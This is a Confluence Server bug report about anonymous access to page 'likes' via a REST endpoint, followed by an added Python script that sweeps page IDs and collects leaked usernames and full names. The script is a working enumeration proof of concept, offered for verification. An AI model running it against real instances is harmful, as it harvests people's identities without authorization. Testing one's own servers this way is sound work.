/rest/likes/1.0/content does not check page permissions properly



      NOTE: This bug report is for Confluence Server. Using Confluence Cloud? See the corresponding bug report.

      ID: CONF-001 - Information Exposure
      CWE ID: 200
      CWE Description: An information exposure is the intentional or unintentional disclosure of information to an actor that is not explicitly authorized to have access to that information.
      Additional description: One REST service (/rest/likes/1.0/content) doesn't (properly) authenticate requests. An anonymous user can request a list of 'likes' from arbitrary pages that aren't accessible to anonymous users. Confluence returns a list of Confluence usernames, as well as the full usernames of the users who 'like' that page.
      This could help an attacker: by brute-forcing page_ID it's possible to obtain a list of the usernames and full usernames of all persons who have 'liked' one or more pages.
      Affected URL(s):
      /rest/likes/1.0/content/<page_ID>/likes
      /rest/likes/1.0/content/<page_ID>/comment-likes

            Assignee:
            Alice Wang (Inactive)
            Reporter:
            PeterMosmans
            Votes:
            0
            Watchers:
            3

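The following is an added verification script, not part of the original report and not Atlassian's code. It implements the check the report describes: for a range of page IDs it first asks anonymously whether the page itself is readable, then requests both affected endpoints anonymously and records any usernames returned for pages that were not readable. The response shape assumed for the likes endpoints ({"likes": [{"user": {"name": ..., "fullName": ...}}]}), the use of /rest/api/content/<id> as the "is this page anonymously readable" probe, and the demo hostname and page IDs are all assumptions for illustration; adjust them to what your instance actually returns. The demo responses are constructed, so the script runs offline.

```python
"""Anonymous enumeration check for /rest/likes/1.0/content/<page_ID>/{likes,comment-likes}.

Added example (not from the bug report or Atlassian). Every URL shape other than
the two affected endpoints, and the JSON field names, are assumptions.
"""
import json
import urllib.error
import urllib.request
from typing import Callable, Dict, Iterable, List, Set, Tuple

# Both affected endpoints from the report.
ENDPOINTS = ("likes", "comment-likes")

# A fetcher takes a URL and returns (HTTP status, response body). Injecting it
# lets the same logic run against a live server or against constructed data.
Fetcher = Callable[[str], Tuple[int, str]]


def likes_url(base_url: str, page_id: int, endpoint: str) -> str:
    """Build one of the two affected URLs for a given page ID."""
    return f"{base_url.rstrip('/')}/rest/likes/1.0/content/{page_id}/{endpoint}"


def parse_likers(body: str) -> List[Tuple[str, str]]:
    """Extract (username, fullName) pairs from a likes response.

    Assumed shape: {"likes": [{"user": {"name": "...", "fullName": "..."}}]}.
    Anything that does not match (non-JSON, missing keys) yields no users.
    """
    try:
        data = json.loads(body)
    except ValueError:
        return []
    likes = data.get("likes", []) if isinstance(data, dict) else []
    out: List[Tuple[str, str]] = []
    for like in likes:
        user = like.get("user", {}) if isinstance(like, dict) else {}
        name = user.get("name")
        if name:
            out.append((name, user.get("fullName", "")))
    return out


def is_page_visible(base_url: str, page_id: int, fetch: Fetcher) -> bool:
    """Assumption: an anonymous GET of /rest/api/content/<id> returning 200 means
    the page is anonymously readable; anything else (403, 404) means it is not."""
    status, _ = fetch(f"{base_url.rstrip('/')}/rest/api/content/{page_id}")
    return status == 200


def enumerate_likers(base_url: str, page_ids: Iterable[int],
                     fetch: Fetcher) -> Dict[int, Set[Tuple[str, str]]]:
    """Return {page_id: {(username, fullName), ...}} for every page whose likes
    were returned anonymously although the page itself was not readable.

    Likes on anonymously readable pages are skipped: disclosing them is not a
    permission bypass. A non-existent page has no likes and so never appears.
    """
    leaked: Dict[int, Set[Tuple[str, str]]] = {}
    for pid in page_ids:
        if is_page_visible(base_url, pid, fetch):
            continue
        users: Set[Tuple[str, str]] = set()
        for ep in ENDPOINTS:
            status, body = fetch(likes_url(base_url, pid, ep))
            if status == 200:
                users.update(parse_likers(body))
        if users:
            leaked[pid] = users
    return leaked


def http_fetch(url: str) -> Tuple[int, str]:
    """Live fetcher: plain anonymous GET with no session cookie or credentials."""
    try:
        with urllib.request.urlopen(url, timeout=10) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def demo_fetch(url: str) -> Tuple[int, str]:
    """Constructed responses imitating an unpatched instance (not real data):
    page 101 is restricted but leaks likers, 102 is public, 103 does not exist."""
    if url.endswith("/rest/api/content/101"):
        return 403, '{"message":"No permission"}'
    if url.endswith("/rest/api/content/102"):
        return 200, '{"id":"102"}'
    if url.endswith("/content/101/likes"):
        return 200, '{"likes":[{"user":{"name":"jdoe","fullName":"Jane Doe"}}]}'
    if url.endswith("/content/101/comment-likes"):
        return 200, '{"likes":[{"user":{"name":"bsmith","fullName":"Bob Smith"}}]}'
    if url.endswith("/content/102/likes"):
        return 200, '{"likes":[{"user":{"name":"public","fullName":"Pub Lic"}}]}'
    return 404, '{}'


def demo() -> Dict[int, Set[Tuple[str, str]]]:
    """Run the check over the constructed instance; only page 101 should be reported."""
    return enumerate_likers("https://confluence.example.org", range(101, 104), demo_fetch)


if __name__ == "__main__":
    for pid, users in sorted(demo().items()):
        print(pid, sorted(users))
```

To test a real instance, replace demo_fetch with http_fetch and pass the page ID range you want to sweep; a patched server should return nothing, since the likes endpoints should refuse or return empty for pages the anonymous user cannot read.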